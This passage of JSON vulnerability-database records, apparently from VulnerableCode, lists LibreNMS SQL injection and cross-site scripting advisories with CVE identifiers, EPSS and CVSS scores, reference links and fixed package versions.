7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-y5mq-m57f-b3bx"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@25.11.0"}],"aliases":["CVE-2025-65014","GHSA-5mrf-j8v6-f45g"],"risk_score":1.6,"exploitability":"0.5","weighted_severity":"3.3","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-99dx-dees-2fg3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/46210?format=json","vulnerability_id":"VCID-af73-74xn-9fap","summary":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')\nSQL Injection in GitHub repository librenms/librenms prior to 23.10.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-5591","reference_id":"","reference_type":"","scores":[{"value":"0.00125","scoring_system":"epss","scoring_elements":"0.31306","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00125","scoring_system":"epss","scoring_elements":"0.31297","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00125","scoring_system":"epss","scoring_elements":"0.31274","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00125","scoring_system":"epss","scoring_elements":"0.31378","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00125","scoring_system":"epss","scoring_elements":"0.31344","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-5591"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/908aef65967ce6184bdc587fd105660d5d55129e","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-16T17:15:06Z/"}],"url":"https://github.com/librenms/librenms/commit/908aef65967ce6184bdc587fd105660d5d55129e"},{"reference_url":"https://huntr.dev/bounties/54813d42-5b93-440e-b9b1-c179d2cbf090","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-16T17:15:06Z/"}],"url":"https://huntr.dev/bounties/54813d42-5b93-440e-b9b1-c179d2cbf090"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-5591","reference_id":"CVE-2023-5591","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-5591"},{"reference_url":"https://github.com/advisories/GHSA-mr6h-7x2m-rgmq","reference_id":"GHSA-mr6h-7x2m-rgmq","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mr6h-7x2m-rgmq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67342?format=json","purl":"pkg:composer/librenms/librenms@23.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@23.10.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539238?format=json","purl":"pkg:composer/librenms/librenms@201609","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@201609"}],"aliases":["CVE-2023-5591","GHSA-mr6h-7x2m-rgmq"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-af73-74xn-9fap"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50219?format=json","vulnerability_id":"VCID-appm-zs6z-v3b2","summary":"LibreNMS /device-groups name Stored Cross-Site Scripting\n**/device-groups name Stored Cross-Site Scripting**\n- HTTP POST\n- Request-URI(s): \"/device-groups\"\n- Vulnerable parameter(s): \"name\"\n- Attacker must be authenticated with \"admin\" privileges.\n- When a user adds a device group, an HTTP POST request is sent to the Request-URI \"/device-groups\". The name of the newly created device group is stored in the value of the name parameter.\n- After the device group is created, the entry is displayed along with some relevant buttons like Rediscover Devices, Edit, and Delete.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26991","reference_id":"","reference_type":"","scores":[{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.00196","published_at":"2026-06-09T12:55:00Z"},{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.00198","published_at":"2026-06-08T12:55:00Z"},{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.00197","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26991"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/64b31da444369213eb4559ec1c304ebfaa0ba12c","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-20T16:32:06Z/"}],"url":"https://github.com/librenms/librenms/commit/64b31da444369213eb4559ec1c304ebfaa0ba12c"},{"reference_url":"https://github.com/librenms/librenms/pull/19041","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-20T16:32:06Z/"}],"url":"https://github.com/librenms/librenms/pull/19041"},{"reference_url":"https://github.com/librenms/librenms/releases/tag/26.2.0","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-20T16:32:06Z/"}],"url":"https://github.com/librenms/librenms/releases/tag/26.2.0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26991","reference_id":"CVE-2026-26991","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26991"},{"reference_url":"https://github.com/advisories/GHSA-5pqf-54qp-32wx","reference_id":"GHSA-5pqf-54qp-32wx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5pqf-54qp-32wx"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-5pqf-54qp-32wx","reference_id":"GHSA-5pqf-54qp-32wx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-20T16:32:06Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-5pqf-54qp-32wx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74102?format=json","purl":"pkg:composer/librenms/librenms@26.2.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@26.2.0"}],"aliases":["CVE-2026-26991","GHSA-5pqf-54qp-32wx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-appm-zs6z-v3b2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/110299?format=json","vulnerability_id":"VCID-b67g-878z-sygx","summary":"Cross-site Scripting in librenms/librenms\nCross-site Scripting (XSS) - Generic in GitHub repository librenms/librenms prior to 22.10.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-3561","reference_id":"","reference_type":"","scores":[{"value":"0.00324","scoring_system":"epss","scoring_elements":"0.55791","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00324","scoring_system":"epss","scoring_elements":"0.55796","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00324","scoring_system":"epss","scoring_elements":"0.55734","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00467","scoring_system":"epss","scoring_elements":"0.64802","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00467","scoring_system":"epss","scoring_elements":"0.64819","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00467","scoring_system":"epss","scoring_elements":"0.64812","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-3561"},{"reference_url":"https://github.com/librenms/librenms/commit/d86cbcd96d684e4de8dfa50b4490e4e02782d242","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-29T19:59:59Z/"}],"url":"https://github.com/librenms/librenms/commit/d86cbcd96d684e4de8dfa50b4490e4e02782d242"},{"reference_url":"https://huntr.com/bounties/7389e6eb-4bce-4b97-999d-d3b70d8cee34","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.com/bounties/7389e6eb-4bce-4b97-999d-d3b70d8cee34"},{"reference_url":"https://huntr.dev/bounties/7389e6eb-4bce-4b97-999d-d3b70d8cee34","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-29T19:59:59Z/"}],"url":"https://huntr.dev/bounties/7389e6eb-4bce-4b97-999d-d3b70d8cee34"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3561","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3561"},{"reference_url":"https://github.com/advisories/GHSA-264w-gw9g-fhgj","reference_id":"GHSA-264w-gw9g-fhgj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-264w-gw9g-fhgj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/148559?format=json","purl":"pkg:composer/librenms/librenms@22.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2ccw-938t-yyaj"},{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-n5u3-c21p-ukas"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-nyn8-7mkk-zbb3"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-sa1y-ej2a-fba9"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u1km-tzd2-5bhq"},{"vulnerability":"VCID-us6w-wwkm-dqc5"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-w9mu-bbkx-sbeq"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@22.10.0"}],"aliases":["CVE-2022-3561","GHSA-264w-gw9g-fhgj"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-b67g-878z-sygx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/41669?format=json","vulnerability_id":"VCID-bczm-p4wu-efdm","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\nLibreNMS allows XSS via a widget title.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-43324","reference_id":"","reference_type":"","scores":[{"value":"3e-05","scoring_system":"epss","scoring_elements":"0.00111","published_at":"2026-06-08T12:55:00Z"},{"value":"3e-05","scoring_system":"epss","scoring_elements":"0.0011","published_at":"2026-06-09T12:55:00Z"},{"value":"3e-05","scoring_system":"epss","scoring_elements":"0.00114","published_at":"2026-06-06T12:55:00Z"},{"value":"3e-05","scoring_system":"epss","scoring_elements":"0.00112","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-43324"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/99d2462b80435b91a35236639b909eebee432126","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/commit/99d2462b80435b91a35236639b909eebee432126"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-43324","reference_id":"CVE-2021-43324","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-43324"},{"reference_url":"https://github.com/advisories/GHSA-46rx-6jg9-4fh8","reference_id":"GHSA-46rx-6jg9-4fh8","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-46rx-6jg9-4fh8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/59686?format=json","purl":"pkg:composer/librenms/librenms@21.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-13ug-m6cb-hbcc"},{"vulnerability":"VCID-1q9d-aqn7-67ad"},{"vulnerability":"VCID-2ccw-938t-yyaj"},{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3b6p-2q4u-kkb5"},{"vulnerability":"VCID-47n6-dbkp-gbb5"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-64kz-hnxr-vud5"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-76bn-2u1y-kqf2"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7fbt-znx9-ukaj"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-7srz-umtt-n7e1"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-b67g-878z-sygx"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-kn2w-mmss-s7hu"},{"vulnerability":"VCID-m1hm-kqrc-3kbj"},{"vulnerability":"VCID-m6z4-dez3-5kac"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-n5u3-c21p-ukas"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-nyn8-7mkk-zbb3"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-q6u9-mpr9-8qd2"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-qqnn-43db-guek"},{"vulnerability":"VCID-r5m1-15dd-yfc4"},{"vulnerability":"VCID-sa1y-ej2a-fba9"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u1km-tzd2-5bhq"},{"vulnerability":"VCID-us6w-wwkm-dqc5"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-w5dm-5pyj-cfef"},{"vulnerability":"VCID-w9mu-bbkx-sbeq"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-wkt4-vdr8-mkgk"},{"vulnerability":"VCID-x1aq-5a19-yye7"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-y6jm-2987-9uh2"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"},{"vulnerability":"VCID-zech-eg55-gbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@21.11.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539238?format=json","purl":"pkg:composer/librenms/librenms@201609","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@201609"}],"aliases":["CVE-2021-43324","GHSA-46rx-6jg9-4fh8"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bczm-p4wu-efdm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/48014?format=json","vulnerability_id":"VCID-bfnn-xz3r-sfcv","summary":"LibreNMS is vulnerable to Reflected-XSS in `report_this` function\nReflected-XSS in `report_this` function in `librenms/includes/functions.php`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-62365","reference_id":"","reference_type":"","scores":[{"value":"2e-05","scoring_system":"epss","scoring_elements":"0.00048","published_at":"2026-06-09T12:55:00Z"},{"value":"2e-05","scoring_system":"epss","scoring_elements":"0.00049","published_at":"2026-06-07T12:55:00Z"},{"value":"2e-05","scoring_system":"epss","scoring_elements":"0.0005","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-62365"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/30d3dd7e5f5e22a8c23c9db3ad90a731c005b008","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-14T15:16:34Z/"}],"url":"https://github.com/librenms/librenms/commit/30d3dd7e5f5e22a8c23c9db3ad90a731c005b008"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-62365","reference_id":"CVE-2025-62365","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-62365"},{"reference_url":"https://gith